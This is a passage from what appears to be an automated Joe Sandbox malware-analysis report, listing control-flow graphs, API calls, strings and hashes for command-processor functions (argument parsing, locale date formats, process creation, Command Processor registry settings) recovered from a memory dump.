                                                      control_flow_graph 216 7ff7e1dbaa54-7ff7e1dbaa98 call 7ff7e1dbcd90 219 7ff7e1dbaa9e 216->219 220 7ff7e1dcbf5a-7ff7e1dcbf70 call 7ff7e1dc4c1c call 7ff7e1dbff70 216->220 221 7ff7e1dbaaa5-7ff7e1dbaaa8 219->221 223 7ff7e1dbacde-7ff7e1dbad00 221->223 224 7ff7e1dbaaae-7ff7e1dbaac8 wcschr 221->224 230 7ff7e1dbad06 223->230 224->223 227 7ff7e1dbaace-7ff7e1dbaae9 towlower 224->227 227->223 229 7ff7e1dbaaef-7ff7e1dbaaf3 227->229 233 7ff7e1dbaaf9-7ff7e1dbaafd 229->233 234 7ff7e1dcbeb7-7ff7e1dcbec4 call 7ff7e1ddeaf0 229->234 231 7ff7e1dbad0d-7ff7e1dbad1f 230->231 237 7ff7e1dbad22-7ff7e1dbad2a call 7ff7e1dc13e0 231->237 235 7ff7e1dcbbcf 233->235 236 7ff7e1dbab03-7ff7e1dbab07 233->236 246 7ff7e1dcbf43-7ff7e1dcbf59 call 7ff7e1dc4c1c 234->246 247 7ff7e1dcbec6-7ff7e1dcbed8 call 7ff7e1db3240 234->247 249 7ff7e1dcbbde 235->249 239 7ff7e1dbab09-7ff7e1dbab0d 236->239 240 7ff7e1dbab7d-7ff7e1dbab81 236->240 237->221 243 7ff7e1dcbe63 239->243 244 7ff7e1dbab13-7ff7e1dbab17 239->244 240->243 248 7ff7e1dbab87-7ff7e1dbab95 240->248 255 7ff7e1dcbe72-7ff7e1dcbe88 call 7ff7e1db3278 call 7ff7e1dc4c1c 243->255 244->240 250 7ff7e1dbab19-7ff7e1dbab1d 244->250 246->220 247->246 263 7ff7e1dcbeda-7ff7e1dcbee9 call 7ff7e1db3240 247->263 253 7ff7e1dbab98-7ff7e1dbaba0 248->253 259 7ff7e1dcbbea-7ff7e1dcbbec 249->259 250->249 254 7ff7e1dbab23-7ff7e1dbab27 250->254 253->253 258 7ff7e1dbaba2-7ff7e1dbabb3 call 7ff7e1dbcd90 253->258 254->259 261 7ff7e1dbab2d-7ff7e1dbab31 254->261 283 7ff7e1dcbe89-7ff7e1dcbe8c 255->283 258->220 269 7ff7e1dbabb9-7ff7e1dbabde call 7ff7e1dc13e0 call 7ff7e1dc33a8 258->269 265 7ff7e1dcbbf8-7ff7e1dcbc01 259->265 261->230 266 7ff7e1dbab37-7ff7e1dbab3b 261->266 277 7ff7e1dcbef3-7ff7e1dcbef9 263->277 278 7ff7e1dcbeeb-7ff7e1dcbef1 263->278 265->231 266->265 270 7ff7e1dbab41-7ff7e1dbab45 266->270 305 7ff7e1dbac75 269->305 306 7ff7e1dbabe4-7ff7e1dbabe7 269->306 274 7ff7e1dcbc06-7ff7e1dcbc2a call 7ff7e1dc13e0 270->274 275 7ff7e1dbab4b-7ff7e1dbab4f 270->275 294 7ff7e1dcbc2c-7ff7e1dcbc4c _wcsnicmp 274->294 295 7ff7e1dcbc5a-7ff7e1dcbc61 274->295 281 7ff7e1dbad2f-7ff7e1dbad33 275->281 282 7ff7e1dbab55-7ff7e1dbab78 call 7ff7e1dc13e0 275->282 277->246 284 7ff7e1dcbefb-7ff7e1dcbf0d call 7ff7e1db3240 277->284 278->246 278->277 288 7ff7e1dcbc66-7ff7e1dcbc8a call 7ff7e1dc13e0 281->288 289 7ff7e1dbad39-7ff7e1dbad3d 281->289 282->221 291 7ff7e1dcbe92-7ff7e1dcbeaa call 7ff7e1db3278 call 7ff7e1dc4c1c 283->291 292 7ff7e1dbacbe 283->292 284->246 303 7ff7e1dcbf0f-7ff7e1dcbf21 call 7ff7e1db3240 284->303 324 7ff7e1dcbcc4-7ff7e1dcbcdc 288->324 325 7ff7e1dcbc8c-7ff7e1dcbcaa _wcsnicmp 288->325 297 7ff7e1dbad43-7ff7e1dbad49 289->297 298 7ff7e1dcbcde-7ff7e1dcbd02 call 7ff7e1dc13e0 289->298 337 7ff7e1dcbeab-7ff7e1dcbeb6 call 7ff7e1dc4c1c 291->337 301 7ff7e1dbacc0-7ff7e1dbacc7 292->301 294->295 304 7ff7e1dcbc4e-7ff7e1dcbc55 294->304 309 7ff7e1dcbd31-7ff7e1dcbd4f _wcsnicmp 295->309 307 7ff7e1dbad4f-7ff7e1dbad68 297->307 308 7ff7e1dcbd5e-7ff7e1dcbd65 297->308 331 7ff7e1dcbd04-7ff7e1dcbd24 _wcsnicmp 298->331 332 7ff7e1dcbd2a 298->332 301->301 311 7ff7e1dbacc9-7ff7e1dbacda 301->311 303->246 339 7ff7e1dcbf23-7ff7e1dcbf35 call 7ff7e1db3240 303->339 319 7ff7e1dcbbb3-7ff7e1dcbbb7 304->319 316 7ff7e1dbac77-7ff7e1dbac7f 305->316 306->292 321 7ff7e1dbabed-7ff7e1dbac0b call 7ff7e1dbcd90 * 2 306->321 322 7ff7e1dbad6a 307->322 323 7ff7e1dbad6d-7ff7e1dbad70 307->323 308->307 320 7ff7e1dcbd6b-7ff7e1dcbd73 308->320 317 7ff7e1dcbd55 309->317 318 7ff7e1dcbbc2-7ff7e1dcbbca 309->318 311->223 316->292 328 7ff7e1dbac81-7ff7e1dbac85 316->328 317->308 318->221 333 7ff7e1dcbbba-7ff7e1dcbbbd call 7ff7e1dc13e0 319->333 334 7ff7e1dcbd79-7ff7e1dcbd8b iswxdigit 320->334 335 7ff7e1dcbe4a-7ff7e1dcbe5e 320->335 321->337 358 7ff7e1dbac11-7ff7e1dbac14 321->358 322->323 323->237 324->309 325->324 329 7ff7e1dcbcac-7ff7e1dcbcbf 325->329 340 7ff7e1dbac88-7ff7e1dbac8f 328->340 329->319 331->332 338 7ff7e1dcbbac 331->338 332->309 333->318 334->335 342 7ff7e1dcbd91-7ff7e1dcbda3 iswxdigit 334->342 335->333 337->234 338->319 339->246 354 7ff7e1dcbf37-7ff7e1dcbf3e call 7ff7e1db3240 339->354 340->340 345 7ff7e1dbac91-7ff7e1dbac94 340->345 342->335 347 7ff7e1dcbda9-7ff7e1dcbdbb iswxdigit 342->347 345->292 351 7ff7e1dbac96-7ff7e1dbacaa wcsrchr 345->351 347->335 352 7ff7e1dcbdc1-7ff7e1dcbdd7 iswdigit 347->352 351->292 355 7ff7e1dbacac-7ff7e1dbacb9 call 7ff7e1dc1300 351->355 356 7ff7e1dcbddf-7ff7e1dcbdeb towlower 352->356 357 7ff7e1dcbdd9-7ff7e1dcbddd 352->357 354->246 355->292 361 7ff7e1dcbdee-7ff7e1dcbe0f iswdigit 356->361 357->361 358->337 362 7ff7e1dbac1a-7ff7e1dbac33 memset 358->362 363 7ff7e1dcbe11-7ff7e1dcbe15 361->363 364 7ff7e1dcbe17-7ff7e1dcbe23 towlower 361->364 362->305 365 7ff7e1dbac35-7ff7e1dbac4b wcschr 362->365 366 7ff7e1dcbe26-7ff7e1dcbe45 call 7ff7e1dc13e0 363->366 364->366 365->305 367 7ff7e1dbac4d-7ff7e1dbac54 365->367 366->335 368 7ff7e1dbad72-7ff7e1dbad91 wcschr 367->368 369 7ff7e1dbac5a-7ff7e1dbac6f wcschr 367->369 371 7ff7e1dbaf03-7ff7e1dbaf07 368->371 372 7ff7e1dbad97-7ff7e1dbadac wcschr 368->372 369->305 369->368 371->305 372->371 373 7ff7e1dbadb2-7ff7e1dbadc7 wcschr 372->373 373->371 374 7ff7e1dbadcd-7ff7e1dbade2 wcschr 373->374 374->371 375 7ff7e1dbade8-7ff7e1dbadfd wcschr 374->375 375->371 376 7ff7e1dbae03-7ff7e1dbae18 wcschr 375->376 376->371 377 7ff7e1dbae1e-7ff7e1dbae21 376->377 378 7ff7e1dbae24-7ff7e1dbae27 377->378 378->371 379 7ff7e1dbae2d-7ff7e1dbae40 iswspace 378->379 380 7ff7e1dbae42-7ff7e1dbae49 379->380 381 7ff7e1dbae4b-7ff7e1dbae5e 379->381 380->378 382 7ff7e1dbae66-7ff7e1dbae6d 381->382 382->382 383 7ff7e1dbae6f-7ff7e1dbae77 382->383 383->255 384 7ff7e1dbae7d-7ff7e1dbae97 call 7ff7e1dc13e0 383->384 387 7ff7e1dbae9a-7ff7e1dbaea4 384->387 388 7ff7e1dbaea6-7ff7e1dbaead 387->388 389 7ff7e1dbaebc-7ff7e1dbaef8 call 7ff7e1dc0a6c call 7ff7e1dbff70 * 2 387->389 388->389 390 7ff7e1dbaeaf-7ff7e1dbaeba 388->390 389->316 397 7ff7e1dbaefe 389->397 390->387 390->389 397->283
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                                                      • String ID: :$:$:$:ON$OFF
                                                      • API String ID: 972821348-467788257
                                                      • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                      • Instruction ID: f7e4fc3e9d10e990a3eb59c9c5e60b5983400714d21d22fa8d52f268e6204d51
                                                      • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                      • Instruction Fuzzy Hash: 22229F21E0864296EB28FF2595163B9E691FF49B81FC88437C90E47394DFBCE444C7A2
                                                      Function 00007FF7E1DC51EC Relevance: 45.9, APIs: 15, Strings: 11, Instructions: 384COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 398 7ff7e1dc51ec-7ff7e1dc5248 call 7ff7e1dc5508 GetLocaleInfoW 401 7ff7e1dcef32-7ff7e1dcef3c 398->401 402 7ff7e1dc524e-7ff7e1dc5272 GetLocaleInfoW 398->402 405 7ff7e1dcef3f-7ff7e1dcef49 401->405 403 7ff7e1dc5295-7ff7e1dc52b9 GetLocaleInfoW 402->403 404 7ff7e1dc5274-7ff7e1dc527a 402->404 408 7ff7e1dc52de-7ff7e1dc5305 GetLocaleInfoW 403->408 409 7ff7e1dc52bb-7ff7e1dc52c3 403->409 406 7ff7e1dc5280-7ff7e1dc5286 404->406 407 7ff7e1dc54f7-7ff7e1dc54f9 404->407 410 7ff7e1dcef61-7ff7e1dcef6c 405->410 411 7ff7e1dcef4b-7ff7e1dcef52 405->411 406->407 412 7ff7e1dc528c-7ff7e1dc528f 406->412 407->401 415 7ff7e1dc5321-7ff7e1dc5343 GetLocaleInfoW 408->415 416 7ff7e1dc5307-7ff7e1dc531b 408->416 413 7ff7e1dcef75-7ff7e1dcef78 409->413 414 7ff7e1dc52c9-7ff7e1dc52d7 409->414 410->413 411->410 417 7ff7e1dcef54-7ff7e1dcef5f 411->417 412->403 418 7ff7e1dcef99-7ff7e1dcefa3 413->418 419 7ff7e1dcef7a-7ff7e1dcef7d 413->419 414->408 420 7ff7e1dcefaf-7ff7e1dcefb9 415->420 421 7ff7e1dc5349-7ff7e1dc536e GetLocaleInfoW 415->421 416->415 417->405 417->410 418->420 419->408 422 7ff7e1dcef83-7ff7e1dcef8d 419->422 423 7ff7e1dcefbc-7ff7e1dcefc6 420->423 424 7ff7e1dc5374-7ff7e1dc5396 GetLocaleInfoW 421->424 425 7ff7e1dceff2-7ff7e1dceffc 421->425 422->418 426 7ff7e1dcefde-7ff7e1dcefe9 423->426 427 7ff7e1dcefc8-7ff7e1dcefcf 423->427 429 7ff7e1dcf035-7ff7e1dcf03f 424->429 430 7ff7e1dc539c-7ff7e1dc53be GetLocaleInfoW 424->430 428 7ff7e1dcefff-7ff7e1dcf009 425->428 426->425 427->426 432 7ff7e1dcefd1-7ff7e1dcefdc 427->432 433 7ff7e1dcf021-7ff7e1dcf02c 428->433 434 7ff7e1dcf00b-7ff7e1dcf012 428->434 431 7ff7e1dcf042-7ff7e1dcf04c 429->431 435 7ff7e1dc53c4-7ff7e1dc53e6 GetLocaleInfoW 430->435 436 7ff7e1dcf078-7ff7e1dcf082 430->436 439 7ff7e1dcf064-7ff7e1dcf06f 431->439 440 7ff7e1dcf04e-7ff7e1dcf055 431->440 432->423 432->426 433->429 434->433 442 7ff7e1dcf014-7ff7e1dcf01f 434->442 437 7ff7e1dcf0bb-7ff7e1dcf0c5 435->437 438 7ff7e1dc53ec-7ff7e1dc540e GetLocaleInfoW 435->438 441 7ff7e1dcf085-7ff7e1dcf08f 436->441 448 7ff7e1dcf0c8-7ff7e1dcf0d2 437->448 443 7ff7e1dc5414-7ff7e1dc5436 GetLocaleInfoW 438->443 444 7ff7e1dcf0fe-7ff7e1dcf108 438->444 439->436 440->439 445 7ff7e1dcf057-7ff7e1dcf062 440->445 446 7ff7e1dcf091-7ff7e1dcf098 441->446 447 7ff7e1dcf0a7-7ff7e1dcf0b2 441->447 442->428 442->433 451 7ff7e1dcf141-7ff7e1dcf14b 443->451 452 7ff7e1dc543c-7ff7e1dc545e GetLocaleInfoW 443->452 453 7ff7e1dcf10b-7ff7e1dcf115 444->453 445->431 445->439 446->447 454 7ff7e1dcf09a-7ff7e1dcf0a5 446->454 447->437 449 7ff7e1dcf0d4-7ff7e1dcf0db 448->449 450 7ff7e1dcf0ea-7ff7e1dcf0f5 448->450 449->450 455 7ff7e1dcf0dd-7ff7e1dcf0e8 449->455 450->444 460 7ff7e1dcf14e-7ff7e1dcf158 451->460 456 7ff7e1dcf184-7ff7e1dcf18b 452->456 457 7ff7e1dc5464-7ff7e1dc5486 GetLocaleInfoW 452->457 458 7ff7e1dcf12d-7ff7e1dcf138 453->458 459 7ff7e1dcf117-7ff7e1dcf11e 453->459 454->441 454->447 455->448 455->450 461 7ff7e1dcf18e-7ff7e1dcf198 456->461 462 7ff7e1dcf1c4-7ff7e1dcf1ce 457->462 463 7ff7e1dc548c-7ff7e1dc54ae GetLocaleInfoW 457->463 458->451 459->458 464 7ff7e1dcf120-7ff7e1dcf12b 459->464 465 7ff7e1dcf170-7ff7e1dcf17b 460->465 466 7ff7e1dcf15a-7ff7e1dcf161 460->466 467 7ff7e1dcf1b0-7ff7e1dcf1bb 461->467 468 7ff7e1dcf19a-7ff7e1dcf1a1 461->468 471 7ff7e1dcf1d1-7ff7e1dcf1db 462->471 469 7ff7e1dc54b4-7ff7e1dc54f5 setlocale call 7ff7e1dc8f80 463->469 470 7ff7e1dcf207-7ff7e1dcf20e 463->470 464->453 464->458 465->456 466->465 472 7ff7e1dcf163-7ff7e1dcf16e 466->472 467->462 468->467 473 7ff7e1dcf1a3-7ff7e1dcf1ae 468->473 477 7ff7e1dcf211-7ff7e1dcf21b 470->477 475 7ff7e1dcf1f3-7ff7e1dcf1fe 471->475 476 7ff7e1dcf1dd-7ff7e1dcf1e4 471->476 472->460 472->465 473->461 473->467 475->470 476->475 479 7ff7e1dcf1e6-7ff7e1dcf1f1 476->479 480 7ff7e1dcf233-7ff7e1dcf23e 477->480 481 7ff7e1dcf21d-7ff7e1dcf224 477->481 479->471 479->475 481->480 482 7ff7e1dcf226-7ff7e1dcf231 481->482 482->477 482->480
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: InfoLocale$DefaultUsersetlocale
                                                      • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                      • API String ID: 1351325837-2236139042
                                                      • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                      • Instruction ID: 13585ba12c7c99d986d99022a582b6112966797bb33f082acd547125e474cb64
                                                      • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                      • Instruction Fuzzy Hash: BEF17966B0874285EF25EF11D9023B9A6A5FF49B81FC48537CA0D47294EFBCE505C3A2
                                                      Function 00007FF7E1DC4224 Relevance: 45.8, APIs: 19, Strings: 7, Instructions: 328threadprocessstringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 483 7ff7e1dc4224-7ff7e1dc42a5 InitializeProcThreadAttributeList 484 7ff7e1dcecd4-7ff7e1dcecee GetLastError call 7ff7e1dd9eec 483->484 485 7ff7e1dc42ab-7ff7e1dc42e5 UpdateProcThreadAttribute 483->485 492 7ff7e1dced1e 484->492 487 7ff7e1dcecf0-7ff7e1dced19 GetLastError call 7ff7e1dd9eec DeleteProcThreadAttributeList 485->487 488 7ff7e1dc42eb-7ff7e1dc43c6 memset * 2 GetStartupInfoW call 7ff7e1dc3a90 call 7ff7e1dbb900 485->488 487->492 497 7ff7e1dc4638-7ff7e1dc4644 _local_unwind 488->497 498 7ff7e1dc43cc-7ff7e1dc43d3 488->498 499 7ff7e1dc4649-7ff7e1dc4650 497->499 498->499 500 7ff7e1dc43d9-7ff7e1dc43dc 498->500 499->500 503 7ff7e1dc4656-7ff7e1dc465d 499->503 501 7ff7e1dc4415-7ff7e1dc4424 call 7ff7e1dc5a68 500->501 502 7ff7e1dc43de-7ff7e1dc43f5 wcsrchr 500->502 510 7ff7e1dc442a-7ff7e1dc4486 CreateProcessW 501->510 511 7ff7e1dc4589-7ff7e1dc4590 501->511 502->501 504 7ff7e1dc43f7-7ff7e1dc440f lstrcmpW 502->504 503->501 506 7ff7e1dc4663 503->506 504->501 507 7ff7e1dc4668-7ff7e1dc466d call 7ff7e1dd9044 504->507 506->500 507->501 513 7ff7e1dc448b-7ff7e1dc448f 510->513 511->510 514 7ff7e1dc4596-7ff7e1dc45fa CreateProcessAsUserW 511->514 515 7ff7e1dc4672-7ff7e1dc4682 GetLastError 513->515 516 7ff7e1dc4495-7ff7e1dc44c7 CloseHandle call 7ff7e1dc498c 513->516 514->513 518 7ff7e1dc468d-7ff7e1dc4694 515->518 516->518 522 7ff7e1dc44cd-7ff7e1dc44e5 516->522 520 7ff7e1dc46a2-7ff7e1dc46ac 518->520 521 7ff7e1dc4696-7ff7e1dc46a0 518->521 523 7ff7e1dc4705-7ff7e1dc4707 520->523 524 7ff7e1dc46ae-7ff7e1dc46b5 call 7ff7e1dc97bc 520->524 521->520 521->524 525 7ff7e1dc47a3-7ff7e1dc47a9 522->525 526 7ff7e1dc44eb-7ff7e1dc44f2 522->526 523->522 530 7ff7e1dc470d-7ff7e1dc472a call 7ff7e1dbcd90 523->530 540 7ff7e1dc4703 524->540 541 7ff7e1dc46b7-7ff7e1dc4701 call 7ff7e1e0c038 524->541 527 7ff7e1dc45ff-7ff7e1dc4607 526->527 528 7ff7e1dc44f8-7ff7e1dc4507 526->528 527->528 531 7ff7e1dc460d 527->531 532 7ff7e1dc4612-7ff7e1dc4616 528->532 533 7ff7e1dc450d-7ff7e1dc4553 call 7ff7e1dc5cb4 call 7ff7e1dc33f0 call 7ff7e1dc498c 528->533 548 7ff7e1dc473d-7ff7e1dc4767 call 7ff7e1dc13e0 call 7ff7e1dd9eec call 7ff7e1dbff70 _local_unwind 530->548 549 7ff7e1dc472c-7ff7e1dc4738 _local_unwind 530->549 536 7ff7e1dc476c-7ff7e1dc4773 531->536 538 7ff7e1dc47d7-7ff7e1dc47df 532->538 539 7ff7e1dc461c-7ff7e1dc4633 532->539 565 7ff7e1dc4558-7ff7e1dc455e 533->565 536->528 546 7ff7e1dc4779-7ff7e1dc4780 536->546 543 7ff7e1dc47f2-7ff7e1dc483c call 7ff7e1dbff70 DeleteProcThreadAttributeList call 7ff7e1dc8f80 538->543 544 7ff7e1dc47e1-7ff7e1dc47ed CloseHandle 538->544 539->543 540->523 541->523 544->543 546->528 552 7ff7e1dc4786-7ff7e1dc4789 546->552 548->536 549->548 552->528 557 7ff7e1dc478f-7ff7e1dc4792 552->557 557->525 561 7ff7e1dc4794-7ff7e1dc479d call 7ff7e1dda250 557->561 561->525 561->528 568 7ff7e1dc4564-7ff7e1dc4579 call 7ff7e1dc498c 565->568 569 7ff7e1dc47ae-7ff7e1dc47ca call 7ff7e1dc33f0 565->569 568->543 576 7ff7e1dc457f-7ff7e1dc4584 call 7ff7e1dda920 568->576 569->538 576->543
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                                      • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                                      • API String ID: 388421343-2905461000
                                                      • Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                      • Instruction ID: 9b4e86260509a5bce545c06528ef87ae747cf0a7992c602a34ff19da5a651ee2
                                                      • Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                      • Instruction Fuzzy Hash: B1F15D32A08B8295EB61EB11E4427BAF7A4FB89780F904537D94D42754DFBCE444CBA2
                                                      Function 00007FF7E1DC5554 Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 295registryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 579 7ff7e1dc5554-7ff7e1dc55b9 call 7ff7e1dca640 582 7ff7e1dc55bc-7ff7e1dc55e8 RegOpenKeyExW 579->582 583 7ff7e1dc5887-7ff7e1dc588e 582->583 584 7ff7e1dc55ee-7ff7e1dc5631 RegQueryValueExW 582->584 583->582 587 7ff7e1dc5894-7ff7e1dc58db time srand call 7ff7e1dc8f80 583->587 585 7ff7e1dc5637-7ff7e1dc5675 RegQueryValueExW 584->585 586 7ff7e1dcf248-7ff7e1dcf24d 584->586 588 7ff7e1dc5677-7ff7e1dc567c 585->588 589 7ff7e1dc568e-7ff7e1dc56cc RegQueryValueExW 585->589 591 7ff7e1dcf24f-7ff7e1dcf25b 586->591 592 7ff7e1dcf260-7ff7e1dcf265 586->592 593 7ff7e1dc5682-7ff7e1dc5687 588->593 594 7ff7e1dcf28b-7ff7e1dcf290 588->594 595 7ff7e1dc56d2-7ff7e1dc5710 RegQueryValueExW 589->595 596 7ff7e1dcf2b6-7ff7e1dcf2bb 589->596 591->585 592->585 598 7ff7e1dcf26b-7ff7e1dcf286 _wtol 592->598 593->589 594->589 601 7ff7e1dcf296-7ff7e1dcf2b1 _wtol 594->601 599 7ff7e1dc5712-7ff7e1dc5717 595->599 600 7ff7e1dc5729-7ff7e1dc5767 RegQueryValueExW 595->600 602 7ff7e1dcf2bd-7ff7e1dcf2c9 596->602 603 7ff7e1dcf2ce-7ff7e1dcf2d3 596->603 598->585 605 7ff7e1dc571d-7ff7e1dc5722 599->605 606 7ff7e1dcf2f9-7ff7e1dcf2fe 599->606 607 7ff7e1dc579f-7ff7e1dc57dd RegQueryValueExW 600->607 608 7ff7e1dc5769-7ff7e1dc576e 600->608 601->589 602->595 603->595 604 7ff7e1dcf2d9-7ff7e1dcf2f4 _wtol 603->604 604->595 605->600 606->600 609 7ff7e1dcf304-7ff7e1dcf31a wcstol 606->609 612 7ff7e1dc57e3-7ff7e1dc57e8 607->612 613 7ff7e1dcf3a9 607->613 610 7ff7e1dcf320-7ff7e1dcf325 608->610 611 7ff7e1dc5774-7ff7e1dc578f 608->611 609->610 614 7ff7e1dcf34b 610->614 615 7ff7e1dcf327-7ff7e1dcf33f wcstol 610->615 616 7ff7e1dc5795-7ff7e1dc5799 611->616 617 7ff7e1dcf357-7ff7e1dcf35e 611->617 618 7ff7e1dcf363-7ff7e1dcf368 612->618 619 7ff7e1dc57ee-7ff7e1dc5809 612->619 620 7ff7e1dcf3b5-7ff7e1dcf3b8 613->620 614->617 615->614 616->607 616->617 617->607 621 7ff7e1dcf38e 618->621 622 7ff7e1dcf36a-7ff7e1dcf382 wcstol 618->622 623 7ff7e1dc580f-7ff7e1dc5813 619->623 624 7ff7e1dcf39a-7ff7e1dcf39d 619->624 625 7ff7e1dcf3be-7ff7e1dcf3c5 620->625 626 7ff7e1dc582c 620->626 621->624 622->621 623->624 627 7ff7e1dc5819-7ff7e1dc5823 623->627 624->613 629 7ff7e1dc5832-7ff7e1dc5870 RegQueryValueExW 625->629 626->629 630 7ff7e1dcf3ca-7ff7e1dcf3d1 626->630 627->620 628 7ff7e1dc5829 627->628 628->626 631 7ff7e1dc5876-7ff7e1dc5882 RegCloseKey 629->631 632 7ff7e1dcf3dd-7ff7e1dcf3e2 629->632 630->632 631->583 633 7ff7e1dcf433-7ff7e1dcf439 632->633 634 7ff7e1dcf3e4-7ff7e1dcf412 ExpandEnvironmentStringsW 632->634 633->631 635 7ff7e1dcf43f-7ff7e1dcf44c call 7ff7e1dbb900 633->635 636 7ff7e1dcf414-7ff7e1dcf426 call 7ff7e1dc13e0 634->636 637 7ff7e1dcf428 634->637 635->631 640 7ff7e1dcf42e 636->640 637->640 640->633
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: QueryValue$CloseOpensrandtime
                                                      • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                      • API String ID: 145004033-3846321370
                                                      • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                      • Instruction ID: 77d591e3446ce0f2fca22fb1cff1ccbbca039bd77c76ae0072d5dfcad2d33457
